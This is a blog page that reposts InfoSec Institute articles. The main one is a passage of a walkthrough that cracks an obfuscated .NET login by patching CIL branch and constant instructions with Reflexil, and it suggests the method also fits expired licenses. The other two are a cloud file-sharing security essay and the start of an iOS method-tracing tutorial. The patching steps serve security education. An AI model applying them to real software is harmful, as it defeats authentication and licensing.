<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo5.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo5.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.4</em></div>
<div style="margin-bottom: 20px;">
From the aforesaid figure 1.4, the members of this assembly are displaying in some bizarre symbols, whose meanings are almost impossible to comprehend. Let’s expand any of class or namespace, again an inexplicable symbol is found in both panes, and if we select any of the members from the left pane in search of C# code, it does decompile the source code in C# language with obscure symbols, but seems irrelevant altogether with actual functionality as per our speculation.</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo6.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo6.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.5</em></div>
<div style="margin-bottom: 20px;">
Perhaps Reflector doesn’t fit in such circumstances. Let’s try another disassembler, such as ILSPY. Same result, it will also decompile or yield C# source code, but in obscure constructs as follows:</div>
<div style="margin-bottom: 20px; text-align: center;">
<em><img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo7.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo7.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /><br />Figure 1.6</em></div>
<div style="margin-bottom: 20px;">
So, it is concluded that none of decompilers can assist us when the software code binary is protected by obfuscation to resist from analysis, because such binary is submerged with stubs and inexplicable symbols which connotation can’t translate into original form.</div>
<div style="margin-bottom: 20px;">
<strong>Software Functionality Analysis</strong></div>
<div style="margin-bottom: 20px;">
We have source code of this software, but in encrypted form, totally useless for further manipulation. We could not get much of a useful description, even from the disassembled C# code. So, we have to take up another effective approach by examining the functionality of this software so that we could get some clues. The moment the user hits the <em>Logon</em> button after entering the password, the system displays an alert message box which says “Password is Incorrect”. Moreover, when user clicks the <em>OK</em> button in the message box, the application unloads automatically. This is the Hack!!!!!</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo8.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo8.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.7</em></div>
<div style="margin-bottom: 20px;">
So, there are some interesting points we can assume from this software functionality which might be very helpful while manual tracing of crucial code blocks as follows:</div>
<ul>
<li>Locate <strong>MessageBox.Show</strong> implementation.</li>
<li>Locate <strong>Environment.Exit()</strong> method implementation.</li>
<li>Locate <strong><a href="http://resources.infosecinstitute.com/exception-handling/" style="color: rgb(51, 51, 51) !important; text-decoration: none;" title="Exception Handling">Exception Handling</a> </strong>blocks.</li>
<li>Locate <strong>Hide()</strong> method implantation.</li>
<li>Search string <strong>Password is Incorrect</strong>.</li>
<li>Search string <strong>Access Denied</strong>.</li>
<li>Locate <strong>Text Box</strong> and<strong> Buttons</strong> implementation.</li>
</ul>
<div style="margin-bottom: 20px;">
<strong>Interested Code Block Disassembling</strong></div>
<div style="margin-bottom: 20px;">
Up till now, we have a better understanding of code obfuscation; now the question is, how do reverse engineers take up such a challenge? Manual analysis of obfuscated code is such a complex task and almost impossible to achieve, because obfuscated code is in the form of a wide variety of strange symbols whose meaning are incomprehensible or entirely irrelevant to actual functionality. What tools or unique tactics are at their disposal to break into obfuscated code?</div>
<div style="margin-bottom: 20px;">
Let’s come again over encrypted disassembled code in the reflector. It is showing as members of this assembly in inexplicable symbols forms. As a rule of thumb, just only concentrate over the <em>Pink Brick</em> icons in the reflector, because they contain the real code. The remaining is worthless for reverse engineering as follows:</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo9.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo9.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.8</em></div>
<div style="margin-bottom: 20px;">
We have obtained some point of interest earlier from our thorough analysis. Now, we have to perform a search operation in the assembly on the basis of such crucial points by using one the <em>CodeSearch</em> add-on of the reflector. Make sure that the CodeSearch add-on is properly configured in the reflector and open it. Now perform the following searches as:</div>
<div style="margin-bottom: 20px;">
<strong>Locating MessageBox.Show() method</strong></div>
<div style="margin-bottom: 20px;">
After selecting Deobfus.exe from the left pane, type the MessageBox.Show or MessageBox in CodeSearch and hit enter. It is yielding a single result which points out the method in the left pane, where the implementation is specified as follows:</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo10.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo10.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.9</em></div>
<div style="margin-bottom: 20px;">
<strong>Locating Environment.Exit() method</strong></div>
<div style="margin-bottom: 20px;">
Now we search for the <em>Exit</em> Keyword and we find two results. If we click any of them, we can get the method name where its specification is mentioned as follows:</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo11.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo11.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.10</em></div>
<div style="margin-bottom: 20px;">
<strong>Locating “Password is Incorrect” string</strong></div>
<div style="margin-bottom: 20px;">
Unfortunately, CodeSearch doesn’t show any results pertaining to this string, because strings are typically encrypted for obsfucation.</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo12.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo12.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.11</em></div>
<div style="margin-bottom: 20px;">
<span style="text-decoration: underline;"><span style="color: red;"><strong>Note: </strong></span>CodeSearch is case-sensitive</span></div>
<div style="margin-bottom: 20px;">
<strong>Locating Exception Handling blocks</strong></div>
<div style="margin-bottom: 20px;">
It is assumed that programmers would have used the <em>try/catch</em> block to handle unexpected run time while coding. So search these blocks, here we have found some interesting code blocks and it is very relevant to the actual implementation as follows:</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo13.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo13.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.12</em></div>
<div style="margin-bottom: 20px;">
<strong>Locating Hide() Method</strong></div>
<div style="margin-bottom: 20px;">
The application is unloaded automatically when the user clicks the OK button in the message box. Again, search on behalf of this keyword produces very significant results, which resembles the previous search as mentioned in figure 1.12.</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo14.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo14.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.13</em></div>
<div style="margin-bottom: 20px;">
So we can easily conclude from our search analysis that this is the only method where the password authentication functionality would be code. Even if the software code is obfuscated, hopefully identifying an item of interest will lead us to the code we want to reverse or bypass.</div>
<div style="margin-bottom: 20px;">
<strong>Cracking Obfuscated Code</strong></div>
<div style="margin-bottom: 20px;">
Until now, we have gathered sufficient information from disassembled code analysis to subvert the inherent functionality of this software. We have found this code block which is responsible for validating a user on behalf of his correct password, as we can notice and assume in the if condition block. Moreover, if the user enters the correct password, the parent form will be unloaded and successful authentication will bring up another window which is responsible for manipulating classified information.</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo15.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo15.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.14</em></div>
<div style="margin-bottom: 20px;">
So these code segments contain everything that we are looking for. But there is one more thing we could search to ease reverse engineering. Here, the <em>If</em> condition block is evaluating on behalf of a Boolean value, so it might contain a method definition. However, we have to perform one more search in order to identify that method where actual password authentication code would reside. Hence, search <em>true</em> or <em>false</em> string via CodeSearch again. Bingo!!! It produces the exact method code specification as follows:</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo16.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo16.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.15</em></div>
<div style="margin-bottom: 20px;">
Now after, it is time to modify and patch the crucial identified code corresponding to the IL code instructions to subvert the mechanism. Such IL modification could not be done by Reflector alone. Instead, one of its add-ons, Reflexil, shall perform IL assembly code modification. Higher level programming, such as C#, gets converted to CIL instructions which will then be JIT compiled into native machine code at run time. Hence, such opcodes are at the heart of CIL and tell the application what to do. In the lower section of the following figure 1.16, Reflexil is showing CIL code to the corresponding C# code mentioned in the upper section.</div>
<div style="margin-bottom: 20px;">
Looking through the code and CIL, we see an interesting instruction at offset 0 as idc.i4.0, which is actually setting the <em>flag</em>value to <em>false</em>. In the next instruction set, the passed argument is compared with a predefined value (which is the password but in hash form), and finally this method returns a Boolean value.</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo17.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo17.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.16</em></div>
<div style="margin-bottom: 20px;">
So, here are two hacks to subvert this authentication. Either we permanently configure the <em>flag</em> value to <em>true</em> at offset 0, or force the if condition block to always evaluate <em>true</em> at offset 18. Hence, in both of cases, <em>flag</em> value would be <em>true</em> no matter what argument is compared in the if condition block. We have to do something:</div>
<ul>
<li><strong>brfalse.s</strong> <strong>brtrue.s</strong> at offset 18</li>
<li><strong>ldc.i4.0</strong> <strong>ldc.i4.1</strong> offset 0</li>
</ul>
<div style="margin-bottom: 20px;">
In order to modify the <em>brture.s</em> IL instruction, first go to offset 18 and right click, then hit the edit option. Finally, you find the following windows whereby you can modify that particular instruction as follows:</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo18.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo18.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.17</em></div>
<div style="margin-bottom: 20px;">
And to change the <em>flag</em> Boolean value to always <em>true</em>, first select and perform the same operation like earlier. Finally, make sure with the following changes:</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo19.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo19.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.18</em></div>
<div style="margin-bottom: 20px;">
There is one more option to subvert this authentication. As we can see, these three lines are more than likely responsible for getting input from the user via a text box, which is passed as an argument in the method <strong>this.STX(…)</strong>; Once that function return values either True or False, the expression the condition is getting evaluates further and determine that either a new window will be loaded or a Password Incorrect message reflects. If we delete that particular section highlighted in figure 1.19, then <strong>this.STX(…)</strong> will never ever be called or evaluated, and we should be free from entering the password in order to login. So delete the following line mentioned in the right side of the following image 1.19.</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo20.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo20.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.19</em></div>
<div style="margin-bottom: 20px;">
Finally, we are done with all CIL code modification, now right click on the exeselect Reflexil Save as. This operation makes such a change permanently into a new patch version of this software, which is free from authentication limitation.</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo21.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo21.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.20</em></div>
<div style="margin-bottom: 20px;">
Now, run this patched exe file, as usual, an authentication mechanism is opened and it asks to enter the password. Don’t worry, enter any raw value and hit the <em>Logon</em> button. Bingoooooo!!!! We have bypassed the password limitation, now we can access the classified information which was supposed to available only for authenticated users. So, this is how we can reverse engineer an obfuscated executable by applying an effective analysis approach, even if we don’t know the password, or the source code of this exe is obfuscated.</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo22.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo22.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.21</em></div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo23.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo23.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.22</em></div>
<div style="margin-bottom: 20px;">
<strong>Final Note</strong></div>
<div style="margin-bottom: 20px;">
It is relatively easy to reverse engineer a .NET executable when its source code is not in hash form, but deemed very complicated to decompile the source code, especially the commercial software which source code protects from being analyzed and reverse engineered. In this article, we have performed reverse engineering over a protected binary by deep analysis of both obfuscated source code and MSIL assembly code. We’ve successfully modified the application to subvert authentication, even with not having the password. So, this how we can modify any software executable whose source code is even obfuscated, in case its license is expired, we have lost the password, or we are subverting another functionality.</div>
</div>
<div class="meta-info" style="background-color: white; border-bottom-color: rgb(231, 230, 230); border-bottom-style: solid; border-bottom-width: 1px; border-top-color: rgb(231, 230, 230); border-top-style: solid; border-top-width: 1px; clear: both; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 12px; line-height: 34px; margin-top: 36px; overflow: hidden;">
</div>
<div class="meta-info" style="background-color: white; border-bottom-color: rgb(231, 230, 230); border-bottom-style: solid; border-bottom-width: 1px; border-top-color: rgb(231, 230, 230); border-top-style: solid; border-top-width: 1px; clear: both; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 12px; line-height: 34px; margin-top: 36px; overflow: hidden;">
<a href="http://resources.infosecinstitute.com/encrypted-code-reverse-engineering-bypassing-obfuscation/" target="_blank">http://resources.infosecinstitute.com/encrypted-code-reverse-engineering-bypassing-obfuscation/</a></div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-90976175211820700742014-05-05T18:21:00.002-07:002014-05-05T18:21:55.499-07:00[infosecinstitute] Cloud-Based File Sharing Websites: A Data Security Disaster Waiting to Happen?<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Have you ever stopped to consider the sensitivity and potential value of the information you have distributed using the many widely available file sharing websites?</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
These types of sites have seen considerable uptake in recent years, as users struggle to share large files whilst battling standard email file size and gateway limits imposed by IT departments. Many users would argue that restrictions placed on them by central IT policies leave them with no choice but to look for alternative ways to send ‘must share’ data. However, although these sites may seem easy to use, they also pose a considerable data security and compliancy risk to corporate networks.</div>
<a name='more'></a><br />
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>Understanding the Data Security Threats</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
While many file transfer sites claim to have invested heavily in security and authentication mechanisms designed to keep user data safe, recent stories in the press have caused many to question this:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<a href="http://www.bbc.co.uk/news/technology-26969629" style="color: rgb(51, 51, 51) !important; text-decoration: none;"><span style="color: blue; text-decoration: underline;">www.bbc.co.uk/news/technology-26969629</span></a></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<a href="http://www.computerweekly.com/news/2240160676/Unsafe-password-practices-cause-Dropbox-spam-scare" style="color: rgb(51, 51, 51) !important; text-decoration: none;"><span style="color: blue; text-decoration: underline;">www.computerweekly.com/news/2240160676/Unsafe-password-practices-cause-Dropbox-spam-scare</span></a></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<a href="http://www.computerweekly.com/news/2240204366/Dropbox-can-be-hacked-say-security-researchers" style="color: rgb(51, 51, 51) !important; text-decoration: none;"><span style="color: blue; text-decoration: underline;">www.computerweekly.com/news/2240204366/Dropbox-can-be-hacked-say-security-researchers</span></a></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Typically, security breaches can be routed back to one of the following causes – or in some cases, both.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong><em>Access control</em></strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
By their very nature, consumer file transfer sites have been designed with ease of access in mind. Internal and external access to documents and information enables users to share content and work collectively on files, which in turn offers substantial efficiency and cost-saving potential. However, if insufficient access control mechanisms are put in place, the risks to data protection can be significant.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
In many cases, once a user has gone through the initial authentication process steps, there is nothing to stop them from sharing personal or commercially sensitive data with an extended group of external third parties. Additionally, with no auditing or tracking capabilities, in many cases an organisation’s IT team will have little to no visibility over what information has left the corporate network.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
This reduced control also extends to the types of devices and applications that are used to access the data. With links being forwarded to different email addresses, for instance, sensitive information can be downloaded onto personal laptops. This is not only a concern due to potential malware or viruses existing on these devices, but it also means that individuals can continue to access certain information after they have left a project, or even, the company.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong><em>The hacker / cyber security threat</em></strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The recent disclosure of the <a href="http://www.bbc.co.uk/news/technology-26969629" style="color: rgb(51, 51, 51) !important; text-decoration: none;"><span style="color: blue; text-decoration: underline;">Heartbleed bug</span></a> and the ease with which hackers have bypassed the security / authentication mechanisms of many websites that were previously perceived as secure raises a more fundamental security concern. <a href="http://www.computerweekly.com/news/2240160676/Unsafe-password-practices-cause-Dropbox-spam-scare" style="color: rgb(51, 51, 51) !important; text-decoration: none;"><span style="color: blue; text-decoration: underline;">As Dropbox found out when they were hacked two years ago</span></a>, the consequences of unpermitted users gaining access to unencrypted data can be disastrous. An attentive reading of the security credential webpages of many file transfer service providers shows that although they may have taken steps to protect data in transit using TLS, very few have taken steps to encrypt information at rest.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>A Secure Approach to File Transfer</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
These factors pose significant threats to data security – however, they shouldn’t be used as excuses to avoid effective file sharing through Cloud-based service providers. Organisations should be able to take advantage of the benefits offered by file transfer sites, such as time and cost efficiencies, without compromising their data security.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Investment must be made in suitably secure platforms. Sensitive data needs to be encrypted both in transit and at rest, and appropriate access control mechanisms need to be implemented so that organisations and central administrators have full visibility and control over who accesses information – including the ability to restrict the access rights of those no longer relevant to the project, such as ex-employees.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
In addition, independent certification can provide further reassurance for users and their IT departments. <a href="http://www.cesg.gov.uk/pages/404cesg.aspx" style="color: rgb(51, 51, 51) !important; text-decoration: none;"><span style="color: blue; text-decoration: underline;">CESG’s Foundation Grade CPA programme</span></a>, for example, certifies commercial security products for use by government, the wider public sector and industry in lower threat environments. Products that are awarded this certification have to meet a detailed set of characteristics and security principles, and as such, demonstrate that the technology and supporting business processes behind them can be fully trusted to protect sensitive information during the data sharing lifecycle.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>Managing File Tranfer Services</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Aside from data security concerns, file transfer sites can also present service management and integration issues. For many, these sites are seen as separate from traditional email and online collaboration solutions, which means they are procured, developed and managed differently, with solutions kept in isolation from one another. The result is data silos, system complexity, unnecessary costs, additional ongoing management overhead, and low end-user take up.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
In the absence of a centralised solution, various file transfer sites are often used on an ad-hoc basis, again making it difficult for IT staff and senior management to maintain visibility over what information is being shared where and with whom. Similarly, managing multiple sets of credentials for separate email and file transfer services can create problems for users, who may result to using unsecure websites as a solution to this. Not only does this risk a data breach but it also impacts efficiency – one of the reasons these services are used in the first place.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>An Integrated Approach to File Transfer</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
To simplify this process and increase centralised control over the information that employees are sharing with external third parties, an integrated approach to data management needs to be taken. This involves procuring <a href="http://www.egress.com/solutions-large-file-transfer/" style="color: rgb(51, 51, 51) !important; text-decoration: none;"><span style="color: blue; text-decoration: underline;">file transfer solutions</span></a>as part of a broad information sharing platform that also includes <a href="http://www.egress.com/solutions-secure-email/" style="color: rgb(51, 51, 51) !important; text-decoration: none;"><span style="color: blue; text-decoration: underline;">secure email and collaboration functionality</span></a>. Moreover, it is also important that these services sit well within an organisation’s existing infrastructure to improve workflow and business processes.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>Benefitting from Cloud Services</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
File transfers shouldn’t be an issue that makes senior management and IT departments uncomfortable. Visibility over personal and commercially sensitive information shared with third parties shouldn’t be sacrificed to benefit end-user ease of use, and similarly, workplace efficiency should only be impacted positively by file transfer solutions.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The benefits of Cloud services, data protection, and an integrated approach to secure communication shouldn’t be mutually exclusive.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<a href="http://resources.infosecinstitute.com/cloud-based-file-sharing-websites-data-security-disaster-waiting-happen/" target="_blank">http://resources.infosecinstitute.com/cloud-based-file-sharing-websites-data-security-disaster-waiting-happen/</a></div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-83938722491569234862014-05-05T18:19:00.001-07:002014-05-05T18:19:06.847-07:00[infosecinstitute] iOS Application Security Part 34 – Tracing Method calls using Logify<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
In the <a href="http://highaltitudehacks.com/security" style="color: rgb(51, 51, 51) !important; text-decoration: none;"><span style="text-decoration: underline;">previous</span></a> <a href="http://resources.infosecinstitute.com/articles/" style="color: rgb(51, 51, 51) !important; text-decoration: none;" title="articles">articles</a>, we have seen how applications like Snoop-it can trace method calls specific to the application at runtime. This is very important in deducing the flow of the application. The same process can be performed by using a perl script named Logify.pl that comes installed with Theos. The script takes input as a header file and generates the hooking code that we can add in our tweak. We can also specify the classes we want to check. Once the tweak is installed on the device, whenever a method for that particular class is called, the tweak logs out the method along with the arguments to syslog. The first step here is to get the header files for a particular application. You can get the header files by using the -H option in class-dump-z. Once the headers folder is generated, you can copy it to your system.</div>
<a name='more'></a><br />
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat1.png" src="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat1.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Now we can use the Logify.pl script on these header files to generate our tweak. In this case, we are testing on <a href="http://damnvulnerableiosapp.com/" style="color: rgb(51, 51, 51) !important; text-decoration: none;"><span style="text-decoration: underline;">Damn Vulnerable iOS application</span></a>. Let’s add all the classes for which we want to log the method calls. In our case, we select three classes for which we want to trace the method calls, ClientSideInjectionVC, JailbreakDetectionVC and DamnVulnerableAppUtilities.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat2.png" src="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat2.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
This is how our Tweak.xm file looks like.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat3.png" src="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat3.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
